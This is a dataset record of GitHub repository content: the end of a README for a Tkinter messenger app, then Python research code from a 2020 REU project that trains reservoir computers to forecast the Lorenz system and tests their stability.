awesome piece of software.\n\n\n## Features\n- Cross platform GUI client\n- AES256-CBC message client-side encryption\n\n\n## Client\n\n### Information\nMain File: `./VectorMessenger/client.py` \nRun From Source: `poetry run client`\n\n### Startup Args\n| Argument | Description |\n| :------------------ | :----------------------- |\n| `--disable-updater` | Disable VM Updater start |\n\n### Debug Console Commands\n| Command | Description |\n| :--------------- | :------------------------------------------------------------------------- |\n| `clear` | Clear debug window output |\n| `clear-chat` | Clear all messages in chat widget |\n| `refresh-theme` | Read config .json values and update theme |\n| `polling-stop` | Will stop message polling thread |\n| `test-raise` | This command will raise test exception that <ins>will crash</ins> this app |\n| `version` | Print app version |\n| `updates-check` | Check for available updates |\n| `eval <COMMAND>` | Execute `<COMMAND>` in python interpreter |\n\nNote that all commands are <ins>case sensitive</ins>!\n\n\n## Server\n\n### Information\nMain File: `./VectorMessenger/server.py` \nRun From Source: `poetry run server`\n\n### Startup Args\n| Argument | Description |\n| :------------ | :---------------------- |\n| `--localhost` | Run server on localhost |\n\n\n## Preparing Source\n- First of all you need to install the [poetry](https://pypi.org/project/poetry/) dependency manager with pip.\n- If you're on Linux, you will have to install `python3-tk` to your system. 
`Tkinter` is currently used as the base of the cross-platform GUI for the client.\n\n### For Development\n```bash\n# Install all dependencies, including development\n$ poetry install\n```\n\n### For Building\n```bash\n# Install all base dependencies\n$ poetry install --no-dev\n\n# Build client and server\n# Run script with argument --help \n# or read build.py docstring for more information\n$ poetry run python build.py\n```\n\n\n## Special Thanks\n| <ins>Closed Alpha Testers</ins> |\n| :------------------------------ |\n| Dmitry |\n| Max \"Forzz\" Bannov |\n| Nikita \"CrazyFearka\" Stepanov |\n" } ]
13
majorminus66/trend_2020
https://github.com/majorminus66/trend_2020
02aeef0805e1edb5111b0fc16e4c9b2ea855515e
7b71c9509518a888f564ba79f21d3e36661a9481
07ec62361fb2e2301bdeedf012daff6789a26b73
refs/heads/master
2023-06-21T08:31:05.039939
2021-07-14T17:01:41
2021-07-14T17:01:41
273,049,933
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.524720311164856, "alphanum_fraction": 0.5693973302841187, "avg_line_length": 39.040462493896484, "blob_id": "fc775d012c91b2119da30268730c94883b355bd0", "content_id": "4b37f3ce9aaf43e044cd1d43649a3d7c0a3170ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13855, "license_type": "no_license", "max_line_length": 243, "num_lines": 346, "path": "/fall2020multipletraining", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 12:57:49 2020\n\n@author: josephharvey\n\"\"\"\n\nfrom lorenzrungekutta import rungekutta\nfrom lorenzrungekutta import fx\nfrom lorenzrungekutta import fy\nfrom lorenzrungekutta import fz\nimport numpy as np\n#from sklearn.linear_model import Ridge\nfrom scipy import sparse\nfrom scipy.linalg import solve\nfrom scipy.sparse.linalg import eigs\nfrom scipy.stats import wasserstein_distance\nfrom matplotlib import pyplot as plt\n\nclass Reservoir:\n def __init__(self, rk, rsvr_size = 300, spectral_radius = 0.6, input_weight = 1):\n self.rsvr_size = rsvr_size\n \n #get spectral radius < 1\n #gets row density = 0.03333\n unnormalized_W = (np.random.rand(rsvr_size,rsvr_size)*2 - 1)\n for i in range(unnormalized_W[:,0].size):\n for j in range(unnormalized_W[0].size):\n if np.random.rand(1) > 10/rsvr_size:\n unnormalized_W[i][j] = 0\n \n max_eig = eigs(unnormalized_W, k = 1, return_eigenvectors = False, maxiter = 10**5)\n \n self.W = sparse.csr_matrix(spectral_radius/np.abs(max_eig)*unnormalized_W)\n \n const_conn = int(rsvr_size*0.15)\n Win = np.zeros((rsvr_size, 4))\n Win[:const_conn, 0] = (np.random.rand(Win[:const_conn, 0].size)*2 - 1)*input_weight\n Win[const_conn: const_conn + int((rsvr_size-const_conn)/3), 1] = (np.random.rand(Win[const_conn: const_conn + int((rsvr_size-const_conn)/3), 1].size)*2 - 1)*input_weight\n Win[const_conn + int((rsvr_size-const_conn)/3):const_conn + 2*int((rsvr_size-const_conn)/3), 2] = (np.random.rand(Win[const_conn + int((rsvr_size-const_conn)/3):const_conn + 2*int((rsvr_size-const_conn)/3), 2].size)*2 - 1)*input_weight\n Win[const_conn + 2*int((rsvr_size-const_conn)/3):, 3] = (np.random.rand(Win[const_conn + 2*int((rsvr_size-const_conn)/3):, 3].size)*2 - 1)*input_weight\n \n self.Win = sparse.csr_matrix(Win)\n self.X = (np.random.rand(rsvr_size, rk.train_length+2)*2 - 1)\n self.Wout = np.array([])\n \nclass RungeKutta:\n def __init__(self, x0 = 2,y0 = 2,z0 = 23, h = 0.01, T = 300, ttsplit = 5000, noise_scaling = 0):\n u_arr = rungekutta(x0,y0,z0,h,T)[:, ::10] \n self.train_length = ttsplit\n \n u_arr[0] = (u_arr[0] - 0)/7.929788629895004\n u_arr[1] = (u_arr[1] - 0)/8.9932616136662\n u_arr[2] = (u_arr[2] - 23.596294463016896)/8.575917849311919\n \n self.u_arr_train = u_arr[:, :ttsplit+1] \n #size 5001\n \n #noisy training array\n #switch to gaussian \n noise = np.random.randn(self.u_arr_train[:,0].size, self.u_arr_train[0,:].size)*noise_scaling \n self.u_arr_train_noise = self.u_arr_train + noise\n \n #plt.plot(self.u_arr_train_noise[0, :500])\n \n #u[5000], the 5001st element, is the last in u_arr_train and the first in u_arr_test\n self.u_arr_test = u_arr[:, ttsplit:]\n #size 1001\n \n#takes a reservoir object res along with initial conditions\ndef getX(res, rk,x0 = 1,y0 = 1,z0 = 1, noise = False):\n \n if noise:\n u_training = rk.u_arr_train_noise\n else:\n u_training = rk.u_arr_train\n \n #loops through every timestep\n for i in range(0, u_training[0].size):\n u 
= np.append(1, u_training[:,i]).reshape(4,1)\n \n x = res.X[:,i].reshape(res.rsvr_size,1)\n x_update = np.tanh(np.add(res.Win.dot(u), res.W.dot(x)))\n \n res.X[:,i+1] = x_update.reshape(1,res.rsvr_size) \n \n return res.X\n \ndef trainRRM(res, rk, skip = 150):\n print(\"Training... \")\n\n alph = 10**-4 #try -2, -3, -4, -5, -6\n #rrm = Ridge(alpha = alph, solver = 'cholesky')\n \n #train on 10 small training sets with different noise - minimize error over all\n #save the state of the reservoir for noisy datasets\n #also try - train on signal^2 or other function (get more info than just 3 vars) - no noise\n \n Y_train = rk.u_arr_train_noise[:, skip+1:]\n\n \n X = getX(res, rk, noise = True)[:, skip+1:(res.X[0].size - 1)]\n X_train = np.concatenate((np.ones((1, rk.u_arr_train[0].size-(skip+1))), X, rk.u_arr_train_noise[:, skip:-1]), axis = 0) \n #X_train = np.copy(X)\n \n idenmat = np.identity(res.rsvr_size+4)*alph\n data_trstates = np.matmul(Y_train, np.transpose(X_train))\n states_trstates = np.matmul(X_train,np.transpose(X_train))\n res.Wout = np.transpose(solve(np.transpose(states_trstates + idenmat),np.transpose(data_trstates)))\n \n print(\"Training complete \")\n #Y_train = Y_train.transpose()\n #X_train = X.transpose()\n \n #tweak regression param? use 10^-4, 10^-6\n #test Ridge() in simpler context\n #rrm.fit(X_train,Y_train)\n #res.Wout = rrm.coef_\n return res.Wout\n\ndef repeatTraining(res, T = 300, ttsplit = int(300/0.1), repeat_times = 10, skip = 150, noise_scaling = 0.1):\n ic = np.random.rand(3)*2-1\n rk = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = T, ttsplit = ttsplit, noise_scaling = noise_scaling)\n \n print(\"Training... \")\n\n alph = 10**-4\n #rrm = Ridge(alpha = alph, solver = 'cholesky')\n \n #train on 10 small training sets with different noise - minimize error over all\n #save the state of the reservoir for noisy datasets\n #also try - train on signal^2 or other function (get more info than just 3 vars) - no noise\n \n Y_train = rk.u_arr_train[:, skip+1:] \n oneTime = rk.u_arr_train[:, skip+1:]\n \n X = getX(res, rk, noise = True)[:, skip+1:-1]\n \n Y_inputs = rk.u_arr_train_noise[:, skip:(rk.u_arr_train_noise[0].size - 1)]\n for i in range(repeat_times-1):\n Y_train = np.concatenate((Y_train, oneTime), axis = 1)\n noise = np.random.randn(rk.u_arr_train[:,0].size, rk.u_arr_train[0,:].size)*noise_scaling\n rk.u_arr_train_noise = rk.u_arr_train + noise \n X = np.concatenate((X, getX(res, rk, noise = True)[:, skip+1:-1]), axis = 1)\n Y_inputs = np.concatenate((Y_inputs, rk.u_arr_train_noise[:, skip:(rk.u_arr_train_noise[0].size - 1)]), axis = 1) \n \n X_train = np.concatenate((np.ones((1, repeat_times*(rk.u_arr_train[0].size-(skip+1)))), X, Y_inputs), axis = 0) \n #X_train = np.copy(X)\n \n idenmat = np.identity(res.rsvr_size+4)*alph\n data_trstates = np.matmul(Y_train, np.transpose(X_train))\n states_trstates = np.matmul(X_train,np.transpose(X_train))\n res.Wout = np.transpose(solve(np.transpose(states_trstates + idenmat),np.transpose(data_trstates)))\n \n print(\"Training complete \")\n #Y_train = Y_train.transpose()\n #X_train = X.transpose()\n \n #tweak regression param? 
use 10^-4, 10^-6\n #test Ridge() in simpler context\n #rrm.fit(X_train,Y_train)\n #res.Wout = rrm.coef_\n return res.Wout \n\ndef repeatTrainingAvg(res, T = 100, ttsplit = 400, repeat_times = 10, noise_scaling = 0.01): \n rk = RungeKutta(T = T,ttsplit = ttsplit) \n Wout_final = np.zeros((3,res.rsvr_size+4))\n \n for i in range(repeat_times):\n noise = np.random.randn(rk.u_arr_train[:,0].size, rk.u_arr_train[0,:].size)*noise_scaling \n rk.u_arr_train_noise = rk.u_arr_train + noise\n Wout_final = np.add(Wout_final, trainRRM(res, rk, skip = 100))\n \n res.Wout = Wout_final/repeat_times\n \n#CONCATENATE ALL THE DATA BEFORE RUNNING REGRESSION\n \ndef predict(res, x0 = 0, y0 = 0, z0 = 0, steps = 1000):\n Y = np.empty((3, steps + 1))\n X = np.empty((res.rsvr_size, steps + 1))\n \n Y[:,0] = np.array([x0,y0,z0]).reshape(1,3) \n X[:,0] = res.X[:,-2]\n\n \n for i in range(0, steps):\n y_in = np.append(1, Y[:,i]).reshape(4,1)\n x_prev = X[:,i].reshape(res.rsvr_size,1)\n \n x_current = np.tanh(np.add(res.Win.dot(y_in), res.W.dot(x_prev)))\n X[:,i+1] = x_current.reshape(1,res.rsvr_size)\n #X = np.concatenate((X, x_current), axis = 1)\n \n y_out = np.matmul(res.Wout, np.concatenate((np.array([[1]]), x_current, Y[:,i].reshape(3,1)), axis = 0))\n #y_out = np.matmul(res.Wout, x_current)\n Y[:,i+1] = y_out.reshape(1, 3)\n \n\n return Y\n\ndef test(res, num_tests = 10, rkTime = 1000, split = 3000, showMapError = True, showTrajectories = True, showHist = True):\n\n stable_count = 0\n valid_time = np.array([])\n max_sum_square = np.array([])\n mean_sum_square = np.array([]) \n means = np.zeros(num_tests)\n variances = np.zeros(num_tests)\n \n for i in range(num_tests):\n \n vtchange = 0\n x2y2z2 = np.array([])\n \n ic = np.random.rand(3)*2-1\n rktest = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = rkTime, ttsplit = split)\n res.X = (np.zeros((res.rsvr_size, split+2))*2 - 1)\n \n #sets res.X\n getX(res, rktest)\n \n pred = predict(res, x0 = rktest.u_arr_test[0,0], y0 = rktest.u_arr_test[1,0], z0 = rktest.u_arr_test[2,0], steps = (int(rkTime/0.1)-split))\n lorenz_map_x = np.zeros(pred[0].size)\n lorenz_map_x[0] = pred[0][0]\n \n check_vt = True\n for j in range(0, pred[0].size):\n if (j > 0):\n vtchange = vtchange + (rktest.u_arr_test[0, j] - rktest.u_arr_test[0, j-1])**2 + (rktest.u_arr_test[1, j] - rktest.u_arr_test[1, j-1])**2 + (rktest.u_arr_test[2, j] - rktest.u_arr_test[2, j-1])**2\n \n rkmap = RungeKutta(pred[0][j-1]*7.929788629895004, pred[1][j-1]*8.9932616136662, pred[2][j-1]*8.575917849311919+23.596294463016896, h=0.01, T=0.1)\n lorenz_map_x[j] = rkmap.u_arr_train[0][1] \n \n #EXAMINE!!!\n x2error = (pred[0][j]-rkmap.u_arr_train[0][1])**2\n y2error = (pred[1][j]-rkmap.u_arr_train[1][1])**2\n z2error = (pred[2][j]-rkmap.u_arr_train[2][1])**2\n \n x2y2z2 = np.append(x2y2z2, (x2error+y2error+z2error)) \n \n if (np.abs(pred[0, j] - rktest.u_arr_test[0, j]) > 1.5) and check_vt:\n valid_time = np.append(valid_time, j)\n \n print(\"Test \" + str(i) + \" valid time: \" + str(j))\n check_vt = False\n \n x2y2z2 = x2y2z2/1.45\n #print(vtchange/(pred[0].size-1)) \n #print(\"Mean: \" + str(np.mean(pred[0])))\n #print(\"Variance: \" + str(np.var(pred[0])))\n \n if showHist:\n plt.figure() \n plt.hist(pred[0], bins = 11, label = \"Predictions\", alpha = 0.75)\n plt.hist(rktest.u_arr_test[0], bins = 11, label = \"Truth\", alpha = 0.75)\n plt.legend(loc=\"upper right\")\n \n if showMapError:\n #plt.figure()\n #plt.plot(vector_field, label = \"Vector Field Stability Metric\")\n #plt.legend(loc=\"upper right\") 
\n\n plt.figure() \n plt.plot(x2y2z2, label = \"x + y + z square error\")\n plt.legend(loc=\"upper right\")\n \n if showTrajectories:\n plt.figure() \n #plt.plot(lorenz_map_x, label = \"Map Trajectory\", color = \"green\") \n plt.plot(pred[0], label = \"Predictions\")\n plt.plot(rktest.u_arr_test[0], label = \"Truth\") \n plt.legend(loc=\"upper right\") \n \n print(\"Variance of lorenz data x dim: \" + str(np.var(rktest.u_arr_test[0])))\n print(\"Variance of predictions: \" + str(np.var(pred[0]))) \n print(\"Max of total square error: \" + str(max(x2y2z2)))\n print(\"Mean of total error: \" + str(np.mean(x2y2z2)))\n print(\"Wasserstein distance: \" + str(wasserstein_distance(pred[0], rktest.u_arr_test[0])))\n print()\n \n max_sum_square = np.append(max_sum_square, max(x2y2z2))\n mean_sum_square = np.append(mean_sum_square, np.mean(x2y2z2)) \n \n means[i] = np.mean(pred[0])\n variances[i] = np.var(pred[0])\n \n if np.mean(x2y2z2) < 0.01 and 0.98 < np.var(pred[0]) and np.var(pred[0]) < 1.01:\n stable_count += 1\n print(\"stable\")\n print()\n else:\n print(\"unstable\")\n print() \n \n \n \n if showMapError or showTrajectories or showHist:\n plt.show()\n \n #print(\"Variance of total square error: \" + str(np.var(x2y2z2)))\n\n print(\"Avg. max sum square: \" + str(np.mean(max_sum_square)))\n print(\"Avg. mean sum square: \" + str(np.mean(mean_sum_square))) \n print(\"Avg. of x dim: \" + str(np.mean(means)))\n print(\"Var. of x dim: \" + str(np.mean(variances)))\n print()\n \n \n return stable_count/num_tests\n\n\n\n########################################\ntrain_time = 500\n\nstabilities = np.array([]) \neigenvalue_errors = 0 \n\nnoise = 10**-5\n\nresults = np.array([])\nnum_res = 50\n \nfor j in range (num_res):\n try:\n print(\"Reservoir \" + str(j+1) + \" of \" + str(num_res))\n ic = np.random.rand(3)*2-1\n rk = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = train_time, ttsplit = int(train_time/0.1), noise_scaling = noise)\n \n res = Reservoir(rk, rsvr_size = 100, spectral_radius = 0.5, input_weight = 1.0) \n \n trainRRM(res, rk) \n #repeatTraining(res, T = train_time, ttsplit = int(train_time/0.1), repeat_times = i, noise_scaling = noise)\n results = np.append(results, test(res, 1, rkTime = 400, split = 2000, showMapError = False, showTrajectories = False, showHist = False))\n except:\n eigenvalue_errors += 1\n print(\"eigenvalue error occurred.\")\n print()\nstabilities = np.append(stabilities, np.mean(results))\nprint(\"Average percentage of stability for \" + str(num_res) + \" reservoirs at \" + str(train_time) + \" training time: \" + str(np.mean(results)))\n#print(results) \nprint() \nprint(\"Stability values: \" + str(stabilities) )\nprint(\"Encountered \" + str(eigenvalue_errors) + \" eigenvalue errors\")\nprint()\n\n" }, { "alpha_fraction": 0.499051570892334, "alphanum_fraction": 0.5648089647293091, "avg_line_length": 39.11231994628906, "blob_id": "fe5653d3500e9899a7cea6fa8424d9d485ab8ca8", "content_id": "a5e08cabcde722a25a59b68adde8d8b820d59480", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11071, "license_type": "no_license", "max_line_length": 243, "num_lines": 276, "path": "/lorenz_res_vanilla.py", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 12:57:49 2020\n\n@author: josephharvey\n\"\"\"\n\nfrom lorenzrungekutta import rungekutta\nfrom lorenzrungekutta import fx\nfrom lorenzrungekutta import fy\nfrom 
lorenzrungekutta import fz\nimport numpy as np\n#from sklearn.linear_model import Ridge\nfrom scipy import sparse\nfrom scipy.linalg import solve\nfrom scipy.sparse.linalg import eigs\nfrom matplotlib import pyplot as plt\n\nclass Reservoir:\n def __init__(self, rk, rsvr_size = 300, spectral_radius = 0.6, input_weight = 1):\n self.rsvr_size = rsvr_size\n \n #get spectral radius < 1\n #gets row density = 0.03333\n unnormalized_W = (np.random.rand(rsvr_size,rsvr_size)*2 - 1)\n for i in range(unnormalized_W[:,0].size):\n for j in range(unnormalized_W[0].size):\n if np.random.rand(1) > 10/rsvr_size:\n unnormalized_W[i][j] = 0\n \n max_eig = eigs(unnormalized_W, k = 1, return_eigenvectors = False)\n \n self.W = sparse.csr_matrix(spectral_radius/np.abs(max_eig)*unnormalized_W)\n \n const_conn = int(rsvr_size*0.15)\n Win = np.zeros((rsvr_size, 4))\n Win[:const_conn, 0] = (np.random.rand(Win[:const_conn, 0].size)*2 - 1)*input_weight\n Win[const_conn: const_conn + int((rsvr_size-const_conn)/3), 1] = (np.random.rand(Win[const_conn: const_conn + int((rsvr_size-const_conn)/3), 1].size)*2 - 1)*input_weight\n Win[const_conn + int((rsvr_size-const_conn)/3):const_conn + 2*int((rsvr_size-const_conn)/3), 2] = (np.random.rand(Win[const_conn + int((rsvr_size-const_conn)/3):const_conn + 2*int((rsvr_size-const_conn)/3), 2].size)*2 - 1)*input_weight\n Win[const_conn + 2*int((rsvr_size-const_conn)/3):, 3] = (np.random.rand(Win[const_conn + 2*int((rsvr_size-const_conn)/3):, 3].size)*2 - 1)*input_weight\n \n self.Win = sparse.csr_matrix(Win)\n self.X = (np.random.rand(rsvr_size, rk.train_length+2)*2 - 1)\n self.Wout = np.array([])\n \nclass RungeKutta:\n def __init__(self, x0 = 2,y0 = 2,z0 = 23, h = 0.01, T = 300, ttsplit = 5000, noise_scaling = 0):\n u_arr = rungekutta(x0,y0,z0,h,T)[:, ::5]\n self.train_length = ttsplit\n \n u_arr[0] = (u_arr[0] - 0)/7.929788629895004\n u_arr[1] = (u_arr[1] - 0)/8.9932616136662\n u_arr[2] = (u_arr[2] - 23.596294463016896)/8.575917849311919\n \n self.u_arr_train = u_arr[:, :ttsplit+1]\n #size 5001\n \n #noisy training array\n #switch to gaussian \n noise = np.random.randn(self.u_arr_train[:,0].size, self.u_arr_train[0,:].size)*noise_scaling \n self.u_arr_train_noise = self.u_arr_train + noise\n \n #plt.plot(self.u_arr_train_noise[0, :500])\n \n #u[5000], the 5001st element, is the last in u_arr_train and the first in u_arr_test\n self.u_arr_test = u_arr[:, ttsplit:]\n #size 1001\n \n#takes a reservoir object res along with initial conditions\ndef getX(res, rk,x0 = 1,y0 = 1,z0 = 1, noise = False):\n \n if noise:\n u_training = rk.u_arr_train_noise\n else:\n u_training = rk.u_arr_train\n \n #loops through every timestep\n for i in range(0, u_training[0].size):\n u = np.append(1, u_training[:,i]).reshape(4,1)\n \n x = res.X[:,i].reshape(res.rsvr_size,1)\n x_update = np.tanh(np.add(res.Win.dot(u), res.W.dot(x)))\n \n res.X[:,i+1] = x_update.reshape(1,res.rsvr_size) \n \n return res.X\n \ndef trainRRM(res, rk):\n print(\"Training... 
\")\n\n alph = 10**-4\n #rrm = Ridge(alpha = alph, solver = 'cholesky')\n \n #train on 10 small training sets with different noise - minimize error over all\n #save the state of the reservoir for noisy datasets\n #also try - train on signal^2 or other function (get more info than just 3 vars) - no noise\n \n Y_train = rk.u_arr_train[:, 301:]\n\n \n X = getX(res, rk, noise = True)[:, 301:(res.X[0].size - 1)]\n X_train = np.concatenate((np.ones((1, rk.u_arr_train[0].size-301)), X, rk.u_arr_train[:, 300:(rk.u_arr_train[0].size - 1)]), axis = 0)\n #X_train = np.copy(X)\n \n idenmat = np.identity(res.rsvr_size+4)*alph\n data_trstates = np.matmul(Y_train, np.transpose(X_train))\n states_trstates = np.matmul(X_train,np.transpose(X_train))\n res.Wout = np.transpose(solve(np.transpose(states_trstates + idenmat),np.transpose(data_trstates)))\n \n print(\"Training complete \")\n #Y_train = Y_train.transpose()\n #X_train = X.transpose()\n \n #tweak regression param? use 10^-4, 10^-6\n #test Ridge() in simpler context\n #rrm.fit(X_train,Y_train)\n #res.Wout = rrm.coef_\n return\n \ndef predict(res, x0 = 0, y0 = 0, z0 = 0, steps = 1000):\n Y = np.empty((3, steps + 1))\n X = np.empty((res.rsvr_size, steps + 1))\n \n Y[:,0] = np.array([x0,y0,z0]).reshape(1,3) \n X[:,0] = res.X[:,-2]\n\n \n for i in range(0, steps):\n y_in = np.append(1, Y[:,i]).reshape(4,1)\n x_prev = X[:,i].reshape(res.rsvr_size,1)\n \n x_current = np.tanh(np.add(res.Win.dot(y_in), res.W.dot(x_prev)))\n X[:,i+1] = x_current.reshape(1,res.rsvr_size)\n #X = np.concatenate((X, x_current), axis = 1)\n \n y_out = np.matmul(res.Wout, np.concatenate((np.array([[1]]), x_current, Y[:,i].reshape(3,1)), axis = 0))\n #y_out = np.matmul(res.Wout, x_current)\n Y[:,i+1] = y_out.reshape(1, 3)\n \n\n return Y\n\ndef test(res, num_tests = 10, rkTime = 200, split = 2000, showVectorField = True, showTrajectories = True):\n valid_time = np.array([])\n \n means = np.zeros(num_tests)\n variances = np.zeros(num_tests)\n \n for i in range(num_tests):\n pred_dxdt = np.array([]) \n lorenz_dxdt = np.array([])\n pred_dydt = np.array([])\n lorenz_dydt = np.array([])\n pred_dzdt = np.array([])\n lorenz_dzdt = np.array([]) \n x2y2z2 = np.array([]) \n \n ic = np.random.rand(3)*2-1\n rktest = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = rkTime, ttsplit = split)\n res.X = (np.zeros((res.rsvr_size, split+2))*2 - 1)\n \n #sets res.X\n getX(res, rktest)\n \n pred = predict(res, x0 = rktest.u_arr_test[0,0], y0 = rktest.u_arr_test[1,0], z0 = rktest.u_arr_test[2,0], steps = (rkTime*20-split))\n \n check_vt = True\n for j in range(0, pred[0].size):\n if (j > 0) and (j < pred[0].size-1):\n #vector_field = np.append(vector_field, ((pred[0,j+1]-pred[0,j-1])/0.1-fx(pred[0,j]*7.929788629895004, pred[1,j]*8.9932616136662)/7.929788629895004)**2) \n \n pred_dxdt = np.append(pred_dxdt, (pred[0,j+1]-pred[0,j-1])/0.1)\n lorenz_dxdt = np.append(lorenz_dxdt, fx(pred[0,j]*7.929788629895004, pred[1,j]*8.9932616136662)/7.929788629895004) \n \n pred_dydt = np.append(pred_dydt, (pred[1,j+1]-pred[1,j-1])/0.1)\n lorenz_dydt = np.append(lorenz_dydt, fy(pred[0,j]*7.929788629895004, pred[1,j]*8.9932616136662, pred[2,j]*8.575917849311919+23.596294463016896)/8.9932616136662) \n \n pred_dzdt = np.append(pred_dzdt, (pred[2,j+1]-pred[2,j-1])/0.1)\n lorenz_dzdt = np.append(lorenz_dzdt, (fz(pred[0,j]*7.929788629895004, pred[1,j]*8.9932616136662, pred[2,j]*8.575917849311919+23.596294463016896)-23.596294463016896)/8.575917849311919) \n \n x2error = (pred_dxdt[-1]-lorenz_dxdt[-1])**2\n y2error = 
(pred_dydt[-1]-lorenz_dydt[-1])**2\n z2error = (pred_dzdt[-1]-lorenz_dzdt[-1])**2\n \n x2y2z2 = np.append(x2y2z2, (x2error+y2error+z2error)) \n \n if (np.abs(pred[0, j] - rktest.u_arr_test[0, j]) > 1.5) and check_vt:\n valid_time = np.append(valid_time, j)\n \n print(\"Test \" + str(i) + \" valid time: \" + str(j))\n check_vt = False\n \n \n #print(\"Mean: \" + str(np.mean(pred[0])))\n #print(\"Variance: \" + str(np.var(pred[0])))\n \n print(\"Variance of x+y+z square error: \" + str(np.var(x2y2z2)))\n print(\"Max of x+y+z square error: \" + str(max(x2y2z2)))\n \n if max(x2y2z2) > 200 and np.var(x2y2z2) > 100:\n print(\"INSTABILITY PREDICTED\")\n \n print(x2y2z2.size)\n \n means[i] = np.mean(pred[0])\n variances[i] = np.var(pred[0])\n \n if showVectorField:\n #plt.figure()\n #plt.plot(vector_field, label = \"Vector Field Stability Metric\")\n #plt.legend(loc=\"upper right\") \n \n plt.figure() \n plt.plot(x2y2z2, label = \"x + y + z square error\")\n plt.legend(loc=\"upper right\")\n plt.figure()\n plt.plot(pred_dzdt, label = \"pred dzdt\")\n plt.plot(lorenz_dzdt, label = \"lorenz dzdt\") \n plt.legend(loc=\"upper right\")\n plt.figure()\n plt.plot(pred_dydt, label = \"pred dydt\")\n plt.plot(lorenz_dydt, label = \"lorenz dydt\")\n plt.legend(loc=\"upper right\")\n plt.figure()\n plt.plot(pred_dxdt, label = \"pred dxdt\")\n plt.plot(lorenz_dxdt, label = \"lorenz dxdt\")\n plt.legend(loc=\"upper right\")\n \n \n if showTrajectories:\n plt.figure()\n plt.plot(pred[0], label = \"Predictions\")\n plt.plot(rktest.u_arr_test[0], label = \"Truth\") \n plt.legend(loc=\"upper right\") \n \n \n if showVectorField or showTrajectories:\n plt.show()\n \n print(\"Avg. valid time steps: \" + str(np.mean(valid_time)))\n print(\"Std. valid time steps: \" + str(np.std(valid_time)))\n print(\"Avg. of x dim: \" + str(np.mean(means)))\n print(\"Var. 
of x dim: \" + str(np.mean(variances)))\n return np.mean(valid_time)\n\n#use 50, noise_scaling = 0.025\n#res = Reservoir(rsvr_size = 40, spectral_radius = 0.5, input_weight = 1.0)\n#rk = RungeKutta(T = 300, noise_scaling = 0.009)\n#trainRRM(res, rk)\n\n#plot predictions immediately after training \n#predictions = predict(res, x0 = rk.u_arr_test[0,0], y0 = rk.u_arr_test[1,0], z0 = rk.u_arr_test[2,0])\n#plt.plot(predictions[0])\n#plt.plot(rk.u_arr_test[0])\n\n#print(predictions[0,1]-rk.u_arr_test[0,1])\n\n#test(res, 10, showPlots = True)\n\nseed = 19\nnp.random.seed(seed)\n\ntrain_time = 300\nrk = RungeKutta(T = train_time, ttsplit = train_time*20, noise_scaling = 0.001) #ttsplit = train_time*20\n\nresults = np.array([])\nnum_res = 1\nfor i in range (num_res):\n print(\"Reservoir \" + str(i+1) + \" of \" + str(num_res) + \" with seed \" + str(seed))\n res = Reservoir(rk, rsvr_size = 300, spectral_radius = 0.6, input_weight = 1.0)\n trainRRM(res, rk) \n results = np.append(results, test(res, 5, rkTime = 200, showVectorField = True, showTrajectories= True))\n \nprint(\"Average valid time for \" + str(num_res) + \" reservoirs at \" + str(train_time) + \": \" + str(np.mean(results)))\nprint(results) " }, { "alpha_fraction": 0.6200000047683716, "alphanum_fraction": 0.7799999713897705, "avg_line_length": 24, "blob_id": "f6b9b5c8b85e21f9c497317992172c6b46dd17f6", "content_id": "858e9b16a1d6ef52976c819cb50c4468082a9c34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 50, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/README.md", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "# trend_2020\nrepository for my UMD TREND 2020 REU\n" }, { "alpha_fraction": 0.4461916387081146, "alphanum_fraction": 0.5149877071380615, "avg_line_length": 26.486486434936523, "blob_id": "aa70d984dc5d02b8f4c1d767d450b0165d77d1e0", "content_id": "f105de5f3e792418b4f821a2fd183c993d155d87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2035, "license_type": "no_license", "max_line_length": 77, "num_lines": 74, "path": "/lorenzrungekutta.py", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 4 11:26:12 2020\n\n@author: josephharvey\n\"\"\"\nimport numpy as np\nfrom numba import jit\n\na = 10\nb = 28\nc = 8/3\nh = 0.01\nT = 100\n\n@jit(nopython = True, fastmath = True)\ndef fx(x,y):\n return -a*x + a*y\n \n@jit(nopython = True, fastmath = True)\ndef fy(x,y,z):\n return b*x - y - x*z\n\n@jit(nopython = True, fastmath = True)\ndef fz(x,y,z):\n return -c*z + x*y\n\n#@jit(nopython = True, fastmath = True)\ndef rungekutta(x0 = 1,y0 = 1,z0 = 1, h = 0.01, T = 100):\n xarr = np.array([x0])\n yarr = np.array([y0])\n zarr = np.array([z0])\n \n #loops from t = 0 to T \n for i in range(0, int(T/h)):\n \n k1x = fx(xarr[i], yarr[i])\n k1y = fy(xarr[i], yarr[i], zarr[i])\n k1z = fz(xarr[i], yarr[i], zarr[i])\n \n k2x = fx(xarr[i] + h*k1x/2, yarr[i] + h*k1y/2)\n k2y = fy(xarr[i] + h*k1x/2, yarr[i] + h*k1y/2, zarr[i] + h*k1z/2)\n k2z = fz(xarr[i] + h*k1x/2, yarr[i] + h*k1y/2, zarr[i] + h*k1z/2)\n \n k3x = fx(xarr[i] + h*k2x/2, yarr[i] + h*k2y/2)\n k3y = fy(xarr[i] + h*k2x/2, yarr[i] + h*k2y/2, zarr[i] + h*k2z/2)\n k3z = fz(xarr[i] + h*k2x/2, yarr[i] + h*k2y/2, zarr[i] + h*k2z/2)\n \n k4x = fx(xarr[i] + h*k3x, yarr[i] + h*k3y)\n 